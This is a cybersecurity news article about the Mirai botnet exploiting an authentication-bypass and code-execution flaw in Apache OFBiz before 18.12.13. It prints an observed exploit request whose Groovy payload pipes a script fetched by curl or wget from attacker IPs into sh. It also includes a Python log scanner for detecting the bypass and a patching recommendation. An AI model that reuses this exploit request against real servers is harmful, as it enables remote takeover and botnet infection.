Wednesday, November 6, 2024

Mirai Botnet Attacking Apache OFBiz Directory Traversal Vulnerability


The notorious Mirai botnet has been observed exploiting a recently disclosed directory traversal vulnerability in Apache OFBiz.

OFBiz is a Java-based framework from the Apache Foundation used to build ERP (Enterprise Resource Planning) applications; although it is less widespread than commercial alternatives, the systems built on it manage sensitive business data.

Vulnerability Details and Exploitation

According to SANS reports, the vulnerability, patched in May 2024, affects OFBiz versions before 18.12.13. It allows remote command execution by way of a path traversal in the controller's request handling.


The flaw is triggered by appending a semicolon to an unauthenticated URL, followed by a restricted URL. For instance, the URL /webtools/control/forgotPassword;/ProgramExport can be exploited because "forgotPassword" does not require authentication, so the access check passes, while the request is still handled by "ProgramExport", which permits arbitrary code execution.

An attacker can exploit this vulnerability with a POST request that carries the groovyProgram payload either as a URL query parameter or in the request body. Recent attacks have been observed using the following exploit:

POST /webtools/control/forgotPassword;/ProgramExport?groovyProgram=groovyProgram=throw+new+Exception('curl http://95.214.27.196/where/bin.sh
User-Agent: Mozilla/5.0 (Linux; Linux x86_64; en-US) Gecko/20100101 Firefox/122.0
Host: [victim IP address]
Accept: /
Upgrade-Insecure-Requests: 1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 147

groovyProgram=throw+new+Exception('curl http://185.196.10.231/sh | sh -s ofbiz || wget -O- http://185.196.10.231/sh | sh -s ofbiz'.execute().text);
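A defender-side check for the pattern described above, added here as an example and not code from the article or from SANS: it scans web-server access logs for requests whose path uses a ";" segment to reach ProgramExport, which is the signature of the authentication bypass. The log lines, IP addresses and the RESTRICTED list are constructed for this example.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache combined format) for this example only.
SAMPLE_LOG = """\
203.0.113.5 - - [06/Nov/2024:10:01:02 +0000] "POST /webtools/control/forgotPassword;/ProgramExport?groovyProgram=throw+new+Exception HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [06/Nov/2024:10:02:10 +0000] "POST /webtools/control/forgotPassword%3B/ProgramExport HTTP/1.1" 200 77 "-" "curl/8.0"
198.51.100.7 - - [06/Nov/2024:10:03:44 +0000] "GET /webtools/control/forgotPassword HTTP/1.1" 200 3321 "-" "Mozilla/5.0"
198.51.100.8 - - [06/Nov/2024:10:04:01 +0000] "POST /webtools/control/ProgramExport HTTP/1.1" 403 210 "-" "Mozilla/5.0"
"""

# Parse the client IP, request target and status code out of a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Privileged OFBiz controller endpoints that should never be reached through a ';' segment.
# ProgramExport is the endpoint named in the article; extending this list is an assumption.
RESTRICTED = ("ProgramExport",)

def is_bypass_attempt(target):
    """True when the request path uses a ';' segment to reach a restricted endpoint."""
    path = unquote(target.split("?", 1)[0])   # decode %3B and friends before inspecting
    if ";" not in path:
        return False
    tail = path.split(";", 1)[1]              # everything after the first ';'
    return any(name in tail for name in RESTRICTED)

def find_bypass_attempts(log_text):
    """Return (ip, target, status) for every log line that matches the bypass pattern."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if m and is_bypass_attempt(m.group("target")):
            hits.append((m.group("ip"), m.group("target"), int(m.group("status"))))
    return hits

if __name__ == "__main__":
    for ip, target, status in find_bypass_attempts(SAMPLE_LOG):
        # A 200 here means the controller served the restricted endpoint, not just that it was probed.
        print(f"ALERT {ip} {status} {target}")
```

A direct request to /webtools/control/ProgramExport that returns 403 is the access check working and is not flagged; a 200 on the ";/ProgramExport" form is the case to treat as a successful bypass rather than a scan.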

Mirai Botnet Activity


The IP addresses 95.214.27.196 and 185.196.10.231 have been identified as hosting and distributing malware, while 83.222.191.62 has been sending exploits in the request body.

These IPs have been actively scanning and exploiting the OFBiz vulnerability, with the IP 185.196.10.231 previously involved in scanning for IoT vulnerabilities.

Since the vulnerability details were made public, there has been a significant increase in scans targeting OFBiz, peaking at nearly 2000 scans daily. This surge indicates that attackers are actively experimenting with and potentially incorporating this vulnerability into botnets like Mirai.

Organizations using Apache OFBiz must urgently upgrade to 18.12.13 or later to close this critical vulnerability.

The rapid exploitation by the Mirai botnet underscores the importance of timely patching and vigilant monitoring to protect sensitive business data from cyber threats.


Divya
Divya is a Senior Journalist at GBhackers covering Cyber Attacks, Threats, Breaches, Vulnerabilities and other happenings in the cyber world.
